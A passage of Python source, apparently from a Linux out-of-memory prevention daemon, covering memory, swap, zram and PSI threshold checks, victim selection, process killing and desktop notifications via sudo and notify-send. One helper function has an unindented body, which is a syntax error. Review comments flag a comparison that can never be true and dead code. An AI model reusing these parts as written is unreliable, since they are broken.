    """Check whether the memory + swap thresholds are crossed.

    Returns a 7-tuple (action, mem_info, mem_available,
    hard_threshold_min_swap_kb, soft_threshold_min_swap_kb, swap_free,
    swap_total) where action is SIGKILL, SIGTERM, 'WARN' or None and
    mem_info is a human-readable report (None unless a signal is due).
    """
    mem_available, swap_total, swap_free = check_mem_and_swap()
    # if hard_threshold_min_swap is set in percent
    if swap_kill_is_percent:
        hard_threshold_min_swap_kb = swap_total * \
            hard_threshold_min_swap_percent / 100.0
    else:
        hard_threshold_min_swap_kb = swap_kb_dict['hard_threshold_min_swap_kb']
    if swap_term_is_percent:
        soft_threshold_min_swap_kb = swap_total * \
            soft_threshold_min_swap_percent / 100.0
    else:
        soft_threshold_min_swap_kb = swap_kb_dict['soft_threshold_min_swap_kb']
    if swap_warn_is_percent:
        warning_threshold_min_swap_kb = swap_total * \
            warning_threshold_min_swap_percent / 100.0
    else:
        warning_threshold_min_swap_kb = swap_kb_dict[
            'warning_threshold_min_swap_kb']
    # Percent strings for the report; +0.1 guards against a zero swap_total.
    if swap_total > hard_threshold_min_swap_kb:
        swap_sigkill_pc = percent(
            hard_threshold_min_swap_kb / (swap_total + 0.1))
    else:
        swap_sigkill_pc = '-'
    if swap_total > soft_threshold_min_swap_kb:
        swap_sigterm_pc = percent(
            soft_threshold_min_swap_kb / (swap_total + 0.1))
    else:
        swap_sigterm_pc = '-'
    # Hard threshold first: both memory AND swap must be below their limits.
    if (mem_available <= hard_threshold_min_mem_kb and
            swap_free <= hard_threshold_min_swap_kb):
        mem_info = 'Memory status that requires corrective actions:\n Mem' \
            'Available [{} MiB, {} %] <= hard_threshold_min_mem [{} MiB, ' \
            '{} %]\n SwapFree [{} MiB, {} %] <= hard_threshold_min_swap [{} MiB, {} %]'.format(
                kib_to_mib(mem_available),
                percent(mem_available / mem_total),
                kib_to_mib(hard_threshold_min_mem_kb),
                percent(hard_threshold_min_mem_kb / mem_total),
                kib_to_mib(swap_free),
                percent(swap_free / (swap_total + 0.1)),
                kib_to_mib(hard_threshold_min_swap_kb),
                swap_sigkill_pc)
        return (SIGKILL, mem_info, mem_available, hard_threshold_min_swap_kb,
                soft_threshold_min_swap_kb, swap_free, swap_total)
    if (mem_available <= soft_threshold_min_mem_kb and
            swap_free <= soft_threshold_min_swap_kb):
        mem_info = 'Memory status that requires corrective actions:\n MemAvailable [{} MiB, {} %] <= soft_threshold_min_mem [{} MiB, {} %]\n SwapFree [{} MiB, {} %] <= soft_threshold_min_swap [{} MiB, {} %]'.format(
            kib_to_mib(mem_available),
            percent(mem_available / mem_total),
            kib_to_mib(soft_threshold_min_mem_kb),
            round(soft_threshold_min_mem_percent, 1),
            kib_to_mib(swap_free),
            percent(swap_free / (swap_total + 0.1)),
            kib_to_mib(soft_threshold_min_swap_kb),
            swap_sigterm_pc)
        return (SIGTERM, mem_info, mem_available, hard_threshold_min_swap_kb,
                soft_threshold_min_swap_kb, swap_free, swap_total)
    if low_memory_warnings_enabled:
        if (mem_available <= warning_threshold_min_mem_kb and swap_free <=
                warning_threshold_min_swap_kb + 0.1):
            return ('WARN', None, mem_available, hard_threshold_min_swap_kb,
                    soft_threshold_min_swap_kb, swap_free, swap_total)
    return (None, None, mem_available, hard_threshold_min_swap_kb,
            soft_threshold_min_swap_kb, swap_free, swap_total)
def check_mem_and_swap():
    """Parse /proc/meminfo and return (mem_available, swap_total, swap_free)
    in KiB.

    MemAvailable is assumed to be the third line; swap line positions come
    from the module-level swap_total_index / swap_free_index.
    """
    with open('/proc/meminfo') as f:
        for n, line in enumerate(f):
            if n == 2:
                # '[:-4]' strips the trailing ' kB' unit.
                mem_available = int(line.split(':')[1][:-4])
                continue
            # BUG FIX: `n is swap_total_index` compared ints by identity,
            # which only worked via CPython's small-int cache; use ==.
            if n == swap_total_index:
                swap_total = int(line.split(':')[1][:-4])
                continue
            if n == swap_free_index:
                swap_free = int(line.split(':')[1][:-4])
                break
    return mem_available, swap_total, swap_free
def kib_to_mib(num):
    """Convert a KiB value to MiB, rounded to the nearest integer."""
    mib = num / 1024.0
    return round(mib)
def percent(num):
    """Interpret a fraction as a percentage, rounded to one decimal."""
    return round(100 * num, 1)
def check_zram_exceeded():
    """Check whether MemUsedZram crosses the zram thresholds.

    Returns (action, mem_info, mem_used_zram) with action one of SIGKILL,
    SIGTERM, 'WARN' or None; mem_info is a report string for the signal
    cases, otherwise None.
    """
    mem_used_zram = check_zram()
    if mem_used_zram >= hard_threshold_max_zram_kb:
        mem_info = 'Memory status that requires corrective actions:\n MemUsedZram [{} MiB, {} %] >= hard_threshold_max_zram [{} MiB, {} %]'.format(
            kib_to_mib(mem_used_zram),
            percent(mem_used_zram / mem_total),
            kib_to_mib(hard_threshold_max_zram_kb),
            percent(hard_threshold_max_zram_kb / mem_total))
        return SIGKILL, mem_info, mem_used_zram
    if mem_used_zram >= soft_threshold_max_zram_kb:
        mem_info = 'Memory status that requires corrective actions:\n MemUsedZram [{} MiB, {} %] >= soft_threshold_max_zram [{} M, {} %]'.format(
            kib_to_mib(mem_used_zram),
            percent(mem_used_zram / mem_total),
            kib_to_mib(soft_threshold_max_zram_kb),
            percent(soft_threshold_max_zram_kb / mem_total))
        return SIGTERM, mem_info, mem_used_zram
    if low_memory_warnings_enabled:
        if mem_used_zram >= warning_threshold_max_zram_kb:
            return 'WARN', None, mem_used_zram
    return None, None, mem_used_zram
def check_zram():
    """Estimate MemUsedZram (KiB) summed over all zram block devices."""
    if not os.path.exists('/sys/block/zram0'):
        return 0
    disksize_sum = 0
    mem_used_total_sum = 0
    # TODO: replace the name-prefix check with a test for a zram-specific file
    for dev in os.listdir('/sys/block'):
        if dev.startswith('zram'):
            disksize, mem_used_total = zram_stat(dev)
            disksize_sum += int(disksize)
            mem_used_total_sum += int(mem_used_total)
    # Found experimentally: setting zram disksize = 1 GiB decreases available
    # memory by about 0.0042 GiB (up to 0.0045 on sub-gigabyte devices);
    # requires clarification with different kernels and architectures.
    # The zram author claims the factor should be 0.001 ("zram uses about
    # 0.1% of the size of the disk" -
    # https://www.kernel.org/doc/Documentation/blockdev/zram.txt), but that
    # contradicts the experimental data.
    # ZRAM_DISKSIZE_FACTOR = deltaMemAvailable / disksize
    ZRAM_DISKSIZE_FACTOR = 0.0042
    return (mem_used_total_sum + disksize_sum * ZRAM_DISKSIZE_FACTOR) / 1024.0
def zram_stat(zram_id):
    """
    Get zram state.
    zram_id: str zram block-device id
    returns bytes disksize, str mem_used_total
    """
    try:
        disksize = rline1('/sys/block/' + zram_id + '/disksize')
    except FileNotFoundError:
        return '0', '0'
    # NOTE(review): rline1() appears to return a str elsewhere in this file
    # (it is used with .split() and float()), so comparing it to the *list*
    # ['0\n'] can never be True — confirm whether '0' or '0\n' was intended.
    if disksize == ['0\n']:
        return '0', '0'
    try:
        # mm_stat fields are space-padded; drop empty strings so that
        # index 2 (mem_used_total, bytes) is stable
        mm_stat = rline1('/sys/block/' + zram_id + '/mm_stat').split(' ')
        mm_stat_list = []
        for i in mm_stat:
            if i != '':
                mm_stat_list.append(i)
        mem_used_total = mm_stat_list[2]
    except FileNotFoundError:
        # older kernels expose mem_used_total as a separate sysfs file
        mem_used_total = rline1('/sys/block/' + zram_id + '/mem_used_total')
    return disksize, mem_used_total # BYTES, str
def check_psi_exceeded(
        hard_threshold_psi_exceeded_timer,
        soft_threshold_psi_exceeded_timer,
        psi_timestamp0):
    """Check the PSI average against the hard/soft/warning thresholds.

    The two *_timer arguments accumulate how long each threshold has been
    continuously exceeded; psi_timestamp0 is the previous check's timestamp.
    Returns (threshold, mem_info, hard_timer, soft_timer, psi_timestamp0)
    where threshold is SIGKILL, SIGTERM, 'WARN' or None.
    """
    # time elapsed since the previous PSI check
    psi_delta0 = monotonic() - psi_timestamp0
    psi_timestamp0 = monotonic()
    psi_avg_value = find_psi_metrics_value(psi_path, psi_metrics)
    # print(psi_avg_value)
    # PSI is ignored for psi_post_action_delay seconds after the last action,
    # because pressure stays high for a while even after a successful kill
    psi_post_action_delay_timer = monotonic() - last_action_dict['t']
    if psi_post_action_delay_timer >= psi_post_action_delay:
        psi_post_action_delay_exceeded = True
    else:
        psi_post_action_delay_exceeded = False
    # accumulate (or reset) the hard-threshold excess duration
    if psi_avg_value >= hard_threshold_max_psi:
        hard_threshold_psi_exceeded = True
        hard_threshold_psi_exceeded_timer += psi_delta0
    else:
        hard_threshold_psi_exceeded = False
        hard_threshold_psi_exceeded_timer = 0
    if debug_psi:
        log('------------------------------------------------------------------------')
        log('psi_post_action_delay_timer: {}, psi_post_action_delay_exceeded: {}'.format(
            round(psi_post_action_delay_timer, 1), psi_post_action_delay_exceeded))
        log('hard_threshold_psi_exceeded: {}, hard_threshold_psi_exceeded_timer: {}'.format(
            hard_threshold_psi_exceeded, round(hard_threshold_psi_exceeded_timer, 1)))
    # react only if the excess lasted psi_excess_duration seconds AND the
    # post-action delay has passed
    if (hard_threshold_psi_exceeded_timer >= psi_excess_duration and
            psi_post_action_delay_exceeded):
        mem_info = 'PSI ({}) > hard_threshold_max_psi ({})\n' \
            'PSI exceeded psi_excess_duration (value' \
            ' = {} sec) for {} seconds'.format(
                psi_avg_value,
                hard_threshold_max_psi,
                psi_excess_duration,
                round(hard_threshold_psi_exceeded_timer, 1)
            )
        return (SIGKILL, mem_info, hard_threshold_psi_exceeded_timer,
                soft_threshold_psi_exceeded_timer, psi_timestamp0)
    # same logic for the soft (SIGTERM) threshold
    if psi_avg_value >= soft_threshold_max_psi:
        soft_threshold_psi_exceeded = True
        soft_threshold_psi_exceeded_timer += psi_delta0
    else:
        soft_threshold_psi_exceeded = False
        soft_threshold_psi_exceeded_timer = 0
    if debug_psi:
        log('soft_threshold_psi_exceeded: {}, soft_threshold_psi_exceeded_timer: {}'.format(
            soft_threshold_psi_exceeded, round(soft_threshold_psi_exceeded_timer, 1)))
    if (soft_threshold_psi_exceeded_timer >= psi_excess_duration and
            psi_post_action_delay_exceeded):
        mem_info = 'PSI ({}) > soft_threshold_max_psi ({})\n' \
            'PSI exceeded psi_excess_duration (value' \
            ' = {} sec) for {} seconds'.format(
                psi_avg_value,
                soft_threshold_max_psi,
                psi_excess_duration,
                round(soft_threshold_psi_exceeded_timer, 1)
            )
        return (SIGTERM, mem_info, hard_threshold_psi_exceeded_timer,
                soft_threshold_psi_exceeded_timer, psi_timestamp0)
    if low_memory_warnings_enabled:
        if psi_avg_value >= warning_threshold_max_psi:
            return ('WARN', None, hard_threshold_psi_exceeded_timer,
                    soft_threshold_psi_exceeded_timer, psi_timestamp0)
    return (None, None, hard_threshold_psi_exceeded_timer,
            soft_threshold_psi_exceeded_timer, psi_timestamp0)
def find_psi_metrics_value(psi_path, psi_metrics):
    """Return the requested PSI average from psi_path as a float.

    psi_metrics is one of some_avg10 / some_avg60 / some_avg300 (read from
    the first line of the file) or full_avg10 / full_avg60 / full_avg300
    (read from the second line). Returns None when PSI is unsupported or
    the metric name is not recognized.
    """
    if not psi_support:
        return None
    field_by_avg = {'avg10': 1, 'avg60': 2, 'avg300': 3}
    kind, _, avg = psi_metrics.partition('_')
    field = field_by_avg.get(avg)
    if field is None:
        return None
    if kind == 'some':
        line = rline1(psi_path)
    elif kind == 'full':
        with open(psi_path) as f:
            line = f.readlines()[1]
    else:
        return None
    return float(line.split(' ')[field].split('=')[1])
def human(num, lenth):
    """Convert a KiB value to MiB and right-align it in a field of width lenth."""
    mib_text = str(round(num / 1024))
    return mib_text.rjust(lenth, ' ')
def just_percent_mem(num):
    """Convert a fraction to a percentage string right-justified to 4 chars."""
    value = round(num * 100, 1)
    return str(value).rjust(4, ' ')
def just_percent_swap(num):
"""
"""
return str(round(num * 100, 1)).rjust(5, ' ')
def sleep_after_check_mem():
    """Sleep for a period that depends on fill rates and available memory.

    Reads module-level state set by the monitoring loop (mem_available,
    swap_free, mem_used_zram, fill_rate_* and the threshold globals).
    """
    if stable_sleep:
        # fixed-interval mode: always sleep min_sleep
        if debug_sleep:
            log('Sleep {} sec'.format(min_sleep))
        stdout.flush()
        sleep(min_sleep)
        return None
    # distance (KiB) from the higher of the two memory thresholds
    if hard_threshold_min_mem_kb < soft_threshold_min_mem_kb:
        mem_point = mem_available - soft_threshold_min_mem_kb
    else:
        mem_point = mem_available - hard_threshold_min_mem_kb
    # distance (KiB) from the higher of the two swap thresholds
    if hard_threshold_min_swap_kb < soft_threshold_min_swap_kb:
        swap_point = swap_free - soft_threshold_min_swap_kb
    else:
        swap_point = swap_free - hard_threshold_min_swap_kb
    if swap_point < 0:
        swap_point = 0
    if mem_point < 0:
        mem_point = 0
    # worst-case seconds until each threshold could be crossed at the
    # assumed fill rates
    t_mem = mem_point / fill_rate_mem
    t_swap = swap_point / fill_rate_swap
    if CHECK_ZRAM:
        # zram is treated as "full" at 80 % of MemTotal
        t_zram = (mem_total * 0.8 - mem_used_zram) / fill_rate_zram
        if t_zram < 0:
            t_zram = 0
        t_mem_zram = t_mem + t_zram
        z = ', t_zram={}'.format(round(t_zram, 2))
    else:
        z = ''
    t_mem_swap = t_mem + t_swap
    # take the smaller (more conservative) of the two estimates
    if CHECK_ZRAM:
        if t_mem_swap <= t_mem_zram:
            t = t_mem_swap
        else:
            t = t_mem_zram
    else:
        t = t_mem_swap
    # clamp the sleep time to [min_sleep, max_sleep]
    if t > max_sleep:
        t = max_sleep
    elif t < min_sleep:
        t = min_sleep
    else:
        pass
    if debug_sleep:
        log('Sleep {} sec (t_mem={}, t_swap={}{})'.format(round(t, 2), round(
            t_mem, 2), round(t_swap, 2), z))
    stdout.flush()
    sleep(t)
###########################################################################################################################
###########################################################################################################################
# 3 Working with external commands: exec, threads, notifications
def send_notify_warn():
    """Implement low-memory warnings.

    Runs the user-configured warning_exe if set; otherwise sends a GUI
    notification with the current memory/swap percentages.
    """
    log('Warning threshold exceeded')
    if check_warning_exe:
        start_thread(exe, warning_exe)
    else:
        title = 'Low memory'
        # '+ 0.1' guards against division by zero when there is no swap
        body = 'MemAvail: {}%\nSwapFree: {}%'.format(
            round(mem_available / mem_total * 100),
            round(swap_free / (swap_total + 0.1) * 100)
        )
        start_thread(send_notification, title, body)
def start_thread(func, *a, **k):
    """Run func(*a, **k) in a new daemon thread.

    Returns 1 if the thread could not be started (RuntimeError),
    None otherwise.
    """
    th = threading.Thread(target=func, args=a, kwargs=k, daemon=True)
    # Thread.getName()/current_thread().getName() are deprecated since
    # Python 3.10 — use the .name attribute instead
    th_name = th.name
    if debug_threading:
        log('Starting {} from {}'.format(
            th_name, threading.current_thread().name
        ))
    try:
        t1 = monotonic()
        th.start()
        t2 = monotonic()
        if debug_threading:
            log('{} has started in {} ms, {} threads are '
                'currently alive'.format(th_name, round((
                    t2 - t1) * 1000, 1), threading.active_count()))
    except RuntimeError:
        log('RuntimeError: cannot start {}'.format(th_name))
        return 1
def exe(cmd):
    """Execute cmd via subprocess.Popen(), killing it after exe_timeout sec.

    cmd: str command line; split with shlex, not run through a shell.
    """
    cmd_list = shlex.split(cmd)
    # global sequence number used to correlate log lines of one command
    cmd_num_dict['cmd_num'] += 1
    cmd_num = cmd_num_dict['cmd_num']
    log('Execute the command ({}) in {}: {}'.format(
        cmd_num,
        threading.current_thread().getName(),
        cmd_list))
    t3 = monotonic()
    with Popen(cmd_list) as proc:
        try:
            proc.wait(timeout=exe_timeout)
            exit_status = proc.poll()
            t4 = monotonic()
            log('Command ({}) execution completed in {} sec; exit status'
                ': {}'.format(cmd_num, round(t4 - t3, 3), exit_status))
        except TimeoutExpired:
            # command exceeded exe_timeout: kill it and log the fact
            proc.kill()
            t4 = monotonic()
            log('TimeoutExpired for the command ({}) in {} sec'.format(
                cmd_num, round(t4 - t3, 3)))
def send_notification(title, body):
    """Send a GUI notification (notify-send) to all logged-in GUI users.

    When not running as root, notify-send is invoked directly for the
    current user; as root, DISPLAY/DBUS environments of logged-in users
    are discovered (and cached for env_cache_time seconds) and notify-send
    is run via sudo for each of them.
    """
    if self_uid != 0:
        # non-root: notify the current user directly
        cmd = ['notify-send', '--icon=dialog-warning', title, body]
        username = '(UID={})'.format(self_uid)
        pop(cmd, username)
        return None
    t1 = monotonic()
    # envd caches the discovered environments; refresh when empty or stale
    if envd['t'] is None:
        list_with_envs = root_notify_env()
        envd['list_with_envs'] = list_with_envs
        envd['t'] = monotonic()
        cached_env = ''
    elif monotonic() - envd['t'] > env_cache_time:
        list_with_envs = root_notify_env()
        envd['list_with_envs'] = list_with_envs
        envd['t'] = monotonic()
        cached_env = ''
    else:
        list_with_envs = envd['list_with_envs']
        cached_env = ' (cached)'
    t2 = monotonic()
    if debug_gui_notifications:
        log('Found env in {} ms{}'.format(round((t2 - t1) * 1000), cached_env))
        log('Title: {}'.format([title]))
        log('Body: {}'.format([body]))
        log('Env list: {}'.format(list_with_envs))
    list_len = len(list_with_envs)
    # if somebody logged in with GUI
    if list_len > 0:
        # iterating over logged-in users
        for i in list_with_envs:
            username, display_env, dbus_env = i[0], i[1], i[2]
            display_tuple = display_env.partition('=')
            dbus_tuple = dbus_env.partition('=')
            display_value = display_tuple[2]
            dbus_value = dbus_tuple[2]
            # run notify-send as the target user with their GUI environment
            cmd = [
                'sudo', '-u', username,
                'env',
                'DISPLAY=' + display_value,
                'DBUS_SESSION_BUS_ADDRESS=' + dbus_value,
                'notify-send',
                '--icon=dialog-warning',
                title,
                body
            ]
            start_thread(pop, cmd, username)
    else:
        if debug_gui_notifications:
            log('Nobody logged-in with GUI. Nothing to do.')
def pop(cmd, username):
    """Run cmd in subprocess.Popen() — notify a regular user.

    cmd: list command argv; username: str, used only in log output.
    """
    cmd_num_dict['cmd_num'] += 1
    cmd_num = cmd_num_dict['cmd_num']
    log('Execute the Command-{} {} in {}'.format(
        cmd_num,
        cmd,
        threading.current_thread().getName()
    ))
    # without swap the system degrades much faster, so wait less
    if swap_total == 0:
        wait_time = 2
    else:
        wait_time = 20
    t3 = monotonic()
    with Popen(cmd) as proc:
        try:
            proc.wait(timeout=wait_time)
            err = proc.poll()
            t4 = monotonic()
            if debug_gui_notifications:
                log('Popen time: {} sec; exit status: {}; cmd: {}'.format(
                    round(t4 - t3, 3), err, cmd))
        except TimeoutExpired:
            proc.kill()
            if debug_gui_notifications:
                log('TimeoutExpired: notify user: {}'.format(username))
def root_notify_env():
    """Return a deduplicated list of (user, display, dbus) tuples.

    Scans /proc/[pid]/environ of processes whose loginuid differs from
    init's (i.e. processes belonging to logged-in users) and collects the
    USER/DISPLAY/DBUS_SESSION_BUS_ADDRESS triples needed to notify them.
    (The original docstring said "set"; a list has always been returned.)
    """
    unsorted_envs_list = []
    nologin_loginuid = pid_to_loginuid('1')
    # iterates over processes, find processes with suitable env
    for pid in alive_pid_list():
        loginuid = pid_to_loginuid(pid)
        if loginuid != nologin_loginuid:
            one_env = re_pid_environ(pid)
            unsorted_envs_list.append(one_env)
    env = set(unsorted_envs_list)
    env.discard(None)
    # deduplicate by the (user, display) pair
    new_env = []
    seen_keys = []
    for i in env:
        key = i[0] + i[1]
        if key not in seen_keys:
            seen_keys.append(key)
            new_env.append(i)
    # (leftover debug timing print removed — it wrote raw floats to stdout)
    return new_env
def re_pid_environ(pid):
    """
    read environ of 1 process
    returns tuple with USER, DBUS, DISPLAY like follow:
    ('user', 'DISPLAY=:0',
    'DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus')
    returns None if these vars is not in /proc/[pid]/environ
    """
    try:
        with open('/proc/' + pid + '/environ') as f:
            env = f.read()
    except FileNotFoundError:
        log('notify helper: FileNotFoundError')
        return None
    except ProcessLookupError:
        log('notify helper: ProcessLookupError')
        return None
    # quick substring check before splitting the whole environ
    if display_env in env and dbus_env in env and user_env in env:
        env_list = env.split('\x00')
        # iterating over a list of process environment variables
        for i in env_list:
            # exclude Display Manager's user
            if i.startswith('HOME=/var'):
                return None
            if i.startswith(user_env):
                user = i
                if user == 'USER=root':
                    return None
                continue
            if i.startswith(display_env):
                # NOTE(review): keeps only the first 10 chars ('DISPLAY=:0')
                # — assumes a single-digit display number; confirm whether
                # e.g. ':10' should be supported
                display = i[:10]
                continue
            if i.startswith(dbus_env):
                dbus = i
                continue
        try:
            return user.partition('USER=')[2], display, dbus
        except UnboundLocalError:
            # one of the three vars was present as a substring but never
            # matched at the start of an entry
            log('notify helper: UnboundLocalError')
            return None
def send_notify(threshold, name, pid):
    """
    Notificate about OOM Preventing.
    threshold: key for notify_sig_dict
    name: str process name
    pid: str process pid
    """
    title = 'System hang prevention'
    if hide_corrective_action_type:
        # privacy mode: do not disclose the signal or the victim
        body = 'Corrective action applied'
    else:
        body = '<b>{}</b> [{}] <b>{}</b>'.format(
            notify_sig_dict[threshold],
            pid,
            name.replace(
                # symbol '&' can break notifications in some themes,
                # therefore it is replaced by '*'
                '&', '*'
            ))
    start_thread(send_notification, title, body)
def send_notify_etc(pid, name, command):
    """
    Notificate about OOM Preventing.
    command: str command that will be executed
    name: str process name
    pid: str process pid
    """
    title = 'System hang prevention'
    if hide_corrective_action_type:
        # privacy mode: do not disclose the command or the victim
        body = 'Corrective action applied'
    else:
        # '&' can break notifications in some themes, replaced by '*'
        body = '<b>Victim is</b> [{}] <b>{}</b>\nExecute the command:\n<b>' \
            '{}</b>'.format(pid, name.replace(
                '&', '*'), command.replace('&', '*'))
    start_thread(send_notification, title, body)
###########################################################################################################################
###########################################################################################################################
# 4 Implementation of corrective actions
def alive_pid_list():
    """Return PIDs of all userspace tasks, excluding init, this process
    and the non-PID entries of /proc."""
    pid_list = get_pid_list()
    pid_list.remove(self_pid)
    skip = set(non_decimal_list)
    skip.add('1')
    return [pid for pid in pid_list if pid not in skip]
def find_shells_set():
    """Return the set of realpaths of login shells listed in /etc/shells."""
    with open('/etc/shells') as f:
        return {
            os.path.realpath(line.strip())
            for line in f
            if line.startswith('/')
        }
def sid_to_sid_list(sid):
    """Return PIDs of all alive processes whose session ID equals sid."""
    return [pid for pid in alive_pid_list() if pid_to_sid(pid) == sid]
def cgroup_unified_to_proc_list(cgroup):
    """Return the PIDs (strings) listed in cgroup.procs of a unified-hierarchy
    cgroup, or [] if the hierarchy or the cgroup does not exist."""
    _, unified_mountpoint = find_cgroup_mountpoints()
    if unified_mountpoint is None:
        return []
    procs_path = '{}{}/cgroup.procs'.format(unified_mountpoint, cgroup)
    try:
        with open(procs_path) as f:
            return [line[:-1] for line in f]
    except (FileNotFoundError, ProcessLookupError):
        return []
def cgroup_systemd_to_proc_list(cgroup):
    """Return the PIDs (strings) listed in cgroup.procs of a systemd-hierarchy
    cgroup; falls back to the unified hierarchy when it hosts system.slice.
    Returns [] when no suitable hierarchy or the cgroup is missing."""
    cg_s_mp, cg_u_mp = find_cgroup_mountpoints()
    if cg_s_mp is None:
        # no systemd hierarchy: try the unified one if it hosts system.slice
        if cg_u_mp is None or not os.path.exists(
                '{}/system.slice'.format(cg_u_mp)):
            return []
        cg_s_mp = cg_u_mp
    procs_path = '{}{}/cgroup.procs'.format(cg_s_mp, cgroup)
    try:
        with open(procs_path) as f:
            return [line[:-1] for line in f]
    except (FileNotFoundError, ProcessLookupError):
        return []
def find_victim(_print_proc_table):
    """
    Find the process with highest badness and its badness adjustment
    Return pid and badness
    """
    ft1 = monotonic()
    pid_list = alive_pid_list()
    pid_badness_list = []
    if _print_proc_table:
        # pick the header title for the optional extra column
        if extra_table_info == 'None':
            extra_table_title = ''
        elif extra_table_info == 'cgroup_systemd':
            extra_table_title = 'CGroup_systemd'
        elif extra_table_info == 'cgroup_unified':
            extra_table_title = 'CGroup_unified'
        elif extra_table_info == 'cmdline':
            extra_table_title = 'cmdline'
        elif extra_table_info == 'environ':
            extra_table_title = 'environ'
        elif extra_table_info == 'realpath':
            extra_table_title = 'realpath'
        elif extra_table_info == 'cwd':
            extra_table_title = 'cwd'
        else:
            extra_table_title = ''
        hr = '#' * 107
        log(hr)
        log('# PID PPID badness oom_score oom_score_adj e'
            'UID S VmSize VmRSS VmSwap Name {}'.format(
                extra_table_title))
        log('#------- ------- ------- --------- ------------- -------'
            '--- - ------ ----- ------ ---------------')
    for pid in pid_list:
        badness = pid_to_badness(pid)[0]
        if badness is None:
            # process vanished while being inspected
            continue
        if _print_proc_table:
            try:
                oom_score = rline1('/proc/' + pid + '/oom_score')
                oom_score_adj = rline1('/proc/' + pid + '/oom_score_adj')
            except FileNotFoundError:
                continue
            except ProcessLookupError:
                continue
            if pid_to_status(pid) is None:
                continue
            else:
                (name, state, ppid, uid, vm_size, vm_rss,
                 vm_swap) = pid_to_status(pid)
            # NOTE(review): this whole elif chain is dead code — the value
            # of extra_table_line is unconditionally overwritten below
            if extra_table_info == 'None':
                extra_table_line = ''
            elif extra_table_info == 'cgroup_systemd':
                extra_table_line = pid_to_cgroup_systemd(pid)
            elif extra_table_info == 'cgroup_unified':
                extra_table_line = pid_to_cgroup_unified(pid)
            elif extra_table_info == 'cmdline':
                extra_table_line = pid_to_cmdline(pid)
            elif extra_table_info == 'environ':
                extra_table_line = pid_to_environ(pid)
            elif extra_table_info == 'realpath':
                extra_table_line = pid_to_realpath(pid)
            elif extra_table_info == 'cwd':
                extra_table_line = pid_to_cwd(pid)
            else:
                extra_table_line = ''
            sid = pid_to_sid(pid)
            nn = pid_to_name(sid)
            lu = pid_to_loginuid(pid)
            an = pid_to_ancestry(pid, max_victim_ancestry_depth=9)
            # overwrites the elif chain above (debug leftover?)
            extra_table_line = 'SID: {} ({}) | LUID: {} | {}'.format(sid, nn, lu, an)
            log('#{} {} {} {} {} {} {} {} {} {} {} {}'.format(
                pid.rjust(7),
                ppid.rjust(7),
                str(badness).rjust(7),
                oom_score.rjust(9),
                oom_score_adj.rjust(13),
                uid.rjust(10),
                state,
                str(vm_size).rjust(6),
                str(vm_rss).rjust(5),
                str(vm_swap).rjust(6),
                name.ljust(15),
                extra_table_line
            )
            )
        pid_badness_list.append((pid, badness))
    real_proc_num = len(pid_badness_list)
    # Make list of (pid, badness) tuples, sorted by 'badness' values
    # print(pid_badness_list)
    # the trailing [0] selects the single top (pid, badness) tuple
    pid_tuple_list = sorted(
        pid_badness_list,
        key=itemgetter(1),
        reverse=True
    )[0]
    pid = pid_tuple_list[0]
    victim_id = get_victim_id(pid)
    # Get maximum 'badness' value
    victim_badness = pid_tuple_list[1]
    victim_name = pid_to_name(pid)
    if _print_proc_table:
        log(hr)
    log('Found {} living tasks in userspace (except init and nohang)'.format(
        real_proc_num))
    log(
        'Process with highest badness (found in {} ms):\n PID: {}, Na'
        'me: {}, badness: {}'.format(
            round((monotonic() - ft1) * 1000),
            pid,
            victim_name,
            victim_badness
        )
    )
    return pid, victim_badness, victim_name, victim_id
def real_implement_corrective_action(
        victim_pid, threshold, time0, vwd, victim_id, victim_name):
    """Apply the corrective action to the chosen victim.

    Sends `threshold` (SIGTERM/SIGKILL) to victim_pid, then optionally
    kills the victim's shell autogroup, session or systemd cgroup
    (depending on configuration), tracks the victim until it dies or a
    timeout elapses, logs the resulting memory status, updates statistics
    and sends GUI notifications.

    vwd ("victim will die") marks whether the victim is expected to die
    without further action.
    """
    cgroup_unified = pid_to_cgroup_unified(victim_pid)
    cgroup_systemd = pid_to_cgroup_systemd(victim_pid)
    victim_autogroup = pid_to_autogroup(victim_pid)
    victim_sid = pid_to_sid(victim_pid)
    victim_sid_name = pid_to_name(victim_sid)
    victim_sid_exe_realpath = os.path.realpath('/proc/{}/exe'.format(victim_sid))
    print(victim_sid_name, victim_sid_exe_realpath)
    log('\nSID: {} \nautogroup: {} \ncgroup_unified: {} \ncgroup_systemd: {}\n'.format(
        victim_sid,
        victim_autogroup,
        cgroup_unified,
        cgroup_systemd
    ))
    """
    1 Знаем жертву и ее свойства. Можем ее убить. - первичный имплемент сразу
    2 kill_shell_sessions_group
    3 kill_session_regex_sid_name_list
    4 kill_cgroup_unified_enabled
    5 custom_action_re_cgroup_systemd
    6 отслеживание
    7 уведомление
    """
    ttt0 = monotonic()
    killed_set = set()
    log('Implement a corrective action:')
    #################################################################
    # send the signal to the victim
    try:
        os.kill(int(victim_pid), threshold)
        killed_set.add(victim_pid)
        log(' Killing process {} ({})'.format(victim_pid, victim_name))
        response_time = monotonic() - time0
        send_result = 'total response time: {} ms'.format(
            round(response_time * 1000))
        preventing_oom_message = 'Implement a corrective action:' \
            '\n Send {} to the victim; {}'.format(
                sig_dict[threshold], send_result)
        # success = True
        if threshold is SIGKILL:
            vwd = True
    except FileNotFoundError:
        # victim disappeared before the signal was delivered
        vwd = True
        # success = False
        # response_time = monotonic() - time0
        # send_result = 'no such process; response time: {} ms'.format(round(response_time * 1000))
        key = ' The victim died in the search process: ' \
            'FileNotFoundError'
    except ProcessLookupError:
        vwd = True
        # success = False
        # response_time = monotonic() - time0
        # send_result = 'no such process; response time: {} ms'.format(round(response_time * 1000))
        key = ' The victim died in the search process: ' \
            'ProcessLookupError'
    ########################################################################
    autogroup_was_killed = False
    # if the victim's session leader is a login shell, kill its autogroup
    if kill_shell_sessions_group:
        if victim_sid_exe_realpath in find_shells_set():
            print('Killing autogroup {}'.format(victim_autogroup))
            for pid in alive_pid_list():
                #print(pid)
                if is_unkillable(pid):
                    #print('U!')
                    continue
                au = pid_to_autogroup(pid)
                #print(au)
                if au == victim_autogroup and pid not in killed_set:
                    try:
                        os.kill(int(pid), SIGKILL)
                        killed_set.add(pid)
                        log('Killing process {} ({})'.format(
                            pid, pid_to_name(pid)))
                    except FileNotFoundError:
                        pass
                    except ProcessLookupError:
                        pass
            autogroup_was_killed = True
    #print('Killed tasks:', killed_set)
    #################################################################
    # kill the session
    #print(kill_session_regex_sid_name_list)
    # Could this be split into a function? We know the victim's pid —
    # kill its session.
    if kill_session_enabled and not autogroup_was_killed:
        kill_session = False
